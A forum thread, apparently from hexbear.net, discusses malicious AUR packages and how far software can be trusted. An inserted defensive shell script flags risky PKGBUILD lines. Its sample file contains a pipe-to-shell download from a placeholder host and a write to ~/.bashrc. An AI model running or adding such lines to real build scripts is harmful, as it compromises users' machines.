Nearly 2000 packages affected now.

I’m starting to become sceptical of package managers as a concept.

    • dustcommie [none/use name]@hexbear.net · 8 upvotes · edited · 8 days ago

      As far as I can tell this only affects AUR (which you have to go out of your way to access, and you are encouraged to review all the build scripts, although in practice I suspect many people are complacent or not knowledgeable enough), not the official repos. I am guessing the official repos for Gentoo and Arch have similar security, but if you go and get unofficial/user ebuilds for Gentoo you likely run into many of the same situations (although I don’t really know much about the Gentoo ecosystem).

      It is also worth pointing out Arch probably has a much larger target on its back since it is much more popular and there are many distros based off of it (which tends to attract the less knowledgeable users, who are primed targets for just randomly getting AUR without thinking).

      Edit: For Gentoo, it looks like GURU is more secure and has trusted users who review, but in practice I don’t know how well they do review or if they have had problems with people trying to submit malicious scripts. Also, it looks like GURU is considered more “official” than AUR, so they are not really direct comparisons, but I suspect they play similar roles in the community.
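The comment above notes that AUR users are expected to read the build scripts before running them. As an added example that is not part of the thread or of any Arch tooling, here is a small POSIX shell triage that flags the PKGBUILD lines most worth reading first; the pattern list and the sample PKGBUILD are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the thread or any AUR tooling: a first-pass triage
# of a PKGBUILD before makepkg. It only highlights lines that deserve a closer
# look; it is no substitute for reading the whole file and its .install script.

# Assumed, non-exhaustive list of patterns worth a second look:
# pipe-to-shell downloads, decoding of embedded blobs, eval, writes to
# login dotfiles or sudoers, and checksum verification disabled with SKIP.
# (A SKIP buried in a multi-line sums array is not caught; read those by hand.)
SUSPICIOUS='(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|eval[[:space:]]|\$HOME/\.(bashrc|profile|ssh)|/etc/sudoers|sums=\(.SKIP.\)'

# Print "lineno:text" for every flagged line, skipping comment lines.
flag_lines() {
    grep -nE "$SUSPICIOUS" "$1" | grep -vE '^[0-9]+:[[:space:]]*#' || true
}

# Number of flagged lines (prints 0 when nothing matches).
count_flags() {
    flag_lines "$1" | grep -c . || true
}

# Constructed sample PKGBUILD for demonstration; example.invalid is a reserved
# name that never resolves, and the package does not exist.
SAMPLE="${TMPDIR:-/tmp}/pkgbuild-triage-sample.$$"
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
# Maintainer: constructed sample (not a real AUR package)
pkgname=sample-tool
pkgver=1.0
pkgrel=1
arch=('any')
source=("https://example.invalid/sample-tool-1.0.tar.gz")
sha256sums=('SKIP')
build() {
  cd "$pkgname-$pkgver"
  curl -s https://example.invalid/setup.sh | sh
  echo 'alias ls=ls' >> "$HOME/.bashrc"
}
package() {
  install -Dm755 sample-tool "$pkgdir/usr/bin/sample-tool"
}
EOF

echo "Lines to review in $SAMPLE:"
flag_lines "$SAMPLE"
echo "$(count_flags "$SAMPLE") line(s) flagged"
```

On the sample it flags the skipped checksum, the pipe-to-shell download and the write to ~/.bashrc, and leaves the ordinary metadata and install lines alone.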

    • kleeon [he/him, he/him]@hexbear.net (OP) · 4 upvotes · 8 days ago

      I’m not super familiar with Portage, but is it inherently safer than other Linux package managers? How sure are you that all the code you’re compiling was not written by Mossad?

      • insurgentrat [she/her, it/its]@hexbear.net · 8 upvotes · 8 days ago

        Computing requires trust. Computers are too large and complex to understand; ultimately you have to have a source of trust somewhere that you rely on to make you not owned, and spend your own attention on other attack surfaces.

        Computing is inherently insecure and risky; you must have a risk model and implement appropriate mitigations such as offline backups, non-email 2FA, sandboxing and so on, as appropriate to your situation.

        I wish it were not so, but it’s not even a capitalism thing; people have been fucking people’s shit up out of curiosity, greed, anger, or accident since forever.

        • kleeon [he/him, he/him]@hexbear.net (OP) · 5 upvotes · 8 days ago

          I agree, but I think there are a lot of ways to make computers safer: enabling sandboxing by default, coming up with a more robust permissions system allowing programs to only access specific parts of the hardware and of the file system (Android already has this). But most importantly, making software that is small, simple and understandable to humans.

          • insurgentrat [she/her, it/its]@hexbear.net · 5 upvotes · 8 days ago

            The Linux security model is outdated, yes; nothing to do with package managers. I recommend using SELinux for finer management.

            Software is how it is because people don’t want software that follows the Unix philosophy. They want bloated pieces of crap that do everything; they don’t want to compose multiple tools or not have stuff try to guess what you mean to do. They want autoconfiguration and highly customised PCs.

            You can set up your own system to be a lovely island of sanity and never install a browser or office suite (I have walked this path and it’s very relaxing), but 99.999999999% of people are vehemently against this and also completely disinterested in their system. So here we are.

            • chgxvjh [he/him, comrade/them]@hexbear.net · 4 upvotes · 8 days ago

              Software is how it is because people don’t want software that follows the unix philosophy.

              Everything is a file means that every program needs a parser, which means that every program will at least depend on some parsing library.

              • insurgentrat [she/her, it/its]@hexbear.net · 6 upvotes · 8 days ago

                That is not the Unix philosophy lol, that is a detail of the kernel.

                In 1978, Doug McIlroy documented a set of principles encapsulating the “characteristic style” that had emerged among Unix system users and developers:

                • Make each program do one thing well. To do a new job, build afresh rather than complicate old programs by adding new “features”.

                • Expect the output of every program to become the input to another, as yet unknown, program. Don’t clutter output with extraneous information. Avoid stringently columnar or binary input formats. Don’t insist on interactive input.

                • Design and build software, even operating systems, to be tried early, ideally within weeks. Don’t hesitate to throw away the clumsy parts and rebuild them.

                • Use tools in preference to unskilled help to lighten a programming task, even if you have to detour to build the tools and expect to throw some of them out after you’ve finished using them.

                https://en.wikipedia.org/wiki/Unix_philosophy

              • cattish [she/her]@hexbear.net · 1 upvote · 7 days ago

                Not every file format has the complexity of JSON. And most of the files the kernel serves are either trivial enough to be parsed with a simple FSM or not meant to be parsed at all. No dev worth their weight in sawdust is gonna pull an external library just to help parse the space-separated numbers of /proc/uptime.

      • SockOlm [she/her]@hexbear.net · 8 upvotes · 8 days ago

        How sure are you that all the code you’re compiling was not written by Mossad?

        Code is inherently untrustworthy. Even if you read every line of source code, can you be certain that the compiler didn’t inject some malware into the program? (Or if you compiled the compiler, how can you be certain that the bootstrapping compiler didn’t embed any malicious code into that one?)